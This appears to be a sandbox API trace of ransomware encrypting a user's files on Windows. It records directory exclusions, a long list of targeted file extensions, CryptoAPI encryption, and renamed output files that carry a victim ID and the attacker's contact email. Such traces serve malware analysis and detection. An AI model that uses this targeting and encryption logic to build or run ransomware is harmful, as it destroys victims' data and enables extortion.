	[0201.389] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\*.*") returned 123
	[0201.389] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0201.390] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\*.*", cchLength=0x7b | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*") returned 0x7b
	[0201.390] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.390] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="windows") returned 0x0
	[0201.390] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.390] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="boot") returned 0x0
	[0201.390] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.390] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="system volume information") returned 0x0
	[0201.390] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.391] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0201.391] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.391] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="temp") returned 0x0
	[0201.391] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.391] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="program files") returned 0x0
	[0201.391] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.391] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="program files (x86)") returned 0x0
	[0201.391] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.392] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="appdata") returned 0x0
	[0201.419] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.419] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="application data") returned 0x0
	[0201.419] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.419] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="winnt") returned 0x0
	[0201.419] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.420] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="tmp") returned 0x0
	[0201.420] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.420] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="cache") returned 0x0
	[0201.420] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.420] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="temporary internet files") returned 0x0
	[0201.420] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.420] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="webcache") returned 0x0
	[0201.420] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.421] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="inetcache") returned 0x0
	[0201.421] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.421] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="nvidia") returned 0x0
	[0201.421] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.421] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="packages") returned 0x0
	[0201.421] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.421] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="cookies") returned 0x0
	[0201.422] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.422] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="programdata") returned 0x0
	[0201.422] FindNextFileW (in: hFindFile=0xfb9470, lpFindFileData=0x187a54 | out: lpFindFileData=0x187a54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18f3e1c0, ftCreationTime.dwHighDateTime=0x1d973a3, ftLastAccessTime.dwLowDateTime=0x79f3cb60, ftLastAccessTime.dwHighDateTime=0x1d97426, ftLastWriteTime.dwLowDateTime=0x79f3cb60, ftLastWriteTime.dwHighDateTime=0x1d97426, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="..", cAlternateFileName="")) returned 1
	[0201.426] FindNextFileW (in: hFindFile=0xfb9470, lpFindFileData=0x187a54 | out: lpFindFileData=0x187a54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb83e0e0, ftCreationTime.dwHighDateTime=0x1d974ed, ftLastAccessTime.dwLowDateTime=0xc62c6110, ftLastAccessTime.dwHighDateTime=0x1d975c3, ftLastWriteTime.dwLowDateTime=0xc62c6110, ftLastWriteTime.dwHighDateTime=0x1d975c3, nFileSizeHigh=0x0, nFileSizeLow=0xb2d5, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="-n18j7bg2YnZdb7Gc.swf", cAlternateFileName="-N18J7~1.SWF")) returned 1
	[0201.426] lstrcmpW (lpString1="-n18j7bg2YnZdb7Gc.swf", lpString2="..") returned 1
	[0201.426] lstrcmpW (lpString1="-n18j7bg2YnZdb7Gc.swf", lpString2=".") returned 1
	[0201.426] lstrcpyW (in: lpString1=0x187ca4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\"
	[0201.426] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\", lpString2="-n18j7bg2YnZdb7Gc.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\-n18j7bg2YnZdb7Gc.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\-n18j7bg2YnZdb7Gc.swf"
	[0201.426] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\-n18j7bg2YnZdb7Gc.swf") returned 141
	[0201.426] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0201.426] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\-n18j7bg2YnZdb7Gc.swf", cchLength=0x8d | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\-n18j7bg2ynzdb7gc.swf") returned 0x8d
	[0201.427] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.427] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\-n18j7bg2ynzdb7gc.swf", lpSrch="help_decrypt_your_files") returned 0x0
	[0201.427] lstrcpyW (in: lpString1=0x18784c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\-n18j7bg2ynzdb7gc.swf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\-n18j7bg2ynzdb7gc.swf") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\-n18j7bg2ynzdb7gc.swf"
	[0201.427] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\-n18j7bg2ynzdb7gc.swf") returned 141
	[0201.427] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.427] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.428] StrStrW (lpFirst=".swf", lpSrch=".") returned=".swf"
	[0201.428] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.428] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swf") returned=".swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0201.428] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0201.428] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0201.428] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\-n18j7bg2ynzdb7gc.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\-n18j7bg2ynzdb7gc.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3b0
	[0201.430] ReadFile (in: hFile=0x3b0, lpBuffer=0xfe21a8, nNumberOfBytesToRead=0xb2d5, lpNumberOfBytesRead=0x187200, lpOverlapped=0x0 | out: lpBuffer=0xfe21a8*, lpNumberOfBytesRead=0x187200*=0xb2d5, lpOverlapped=0x0) returned 1
	[0201.433] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.434] CryptAcquireContextW (in: phProv=0x186db0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x186db0*=0xfcac48) returned 1
	[0201.436] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.436] CryptCreateHash (in: hProv=0xfcac48, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x186db4 | out: phHash=0x186db4) returned 1
	[0201.436] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.436] CryptHashData (hHash=0xfb9670, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0201.436] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.437] CryptDeriveKey (in: hProv=0xfcac48, Algid=0x6610, hBaseData=0xfb9670, dwFlags=0x1, phKey=0x186db8 | out: phKey=0x186db8*=0xfb9130) returned 1
	[0201.437] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.437] CryptEncrypt (in: hKey=0xfb9130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x186dcc*=0xb2d5, dwBufLen=0xb2d5 | out: pbData=0x0*, pdwDataLen=0x186dcc*=0xb2e0) returned 1
	[0201.438] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.439] RtlMoveMemory (in: Destination=0xfed488, Source=0xfe21a8, Length=0xb2d5 | out: Destination=0xfed488) 
	[0201.439] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.440] CryptEncrypt (in: hKey=0xfb9130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfed488*, pdwDataLen=0x186dac*=0xb2d5, dwBufLen=0xb2e0 | out: pbData=0xfed488*, pdwDataLen=0x186dac*=0xb2e0) returned 1
	[0201.440] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.440] CryptDestroyKey (hKey=0xfb9130) returned 1
	[0201.440] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.440] CryptDestroyHash (hHash=0xfb9670) returned 1
	[0201.440] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.441] CryptReleaseContext (hProv=0xfcac48, dwFlags=0x0) returned 1
	[0201.441] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.441] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x186dc8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x186dc8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0201.441] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.442] GetUserNameA (in: lpBuffer=0x186cac, pcbBuffer=0x186dc4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x186dc4) returned 1
	[0201.443] wsprintfW (in: param_1=0x186de0, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\-n18j7bg2ynzdb7gc.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 183
	[0201.443] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\-n18j7bg2ynzdb7gc.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\-n18j7bg2ynzdb7gc.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3b4
	[0201.443] WriteFile (in: hFile=0x3b4, lpBuffer=0xfed488*, nNumberOfBytesToWrite=0xb2e0, lpNumberOfBytesWritten=0x187208, lpOverlapped=0x0 | out: lpBuffer=0xfed488*, lpNumberOfBytesWritten=0x187208*=0xb2e0, lpOverlapped=0x0) returned 1
	[0201.448] CloseHandle (hObject=0x3b4) returned 1
	[0201.448] CloseHandle (hObject=0x3b0) returned 1
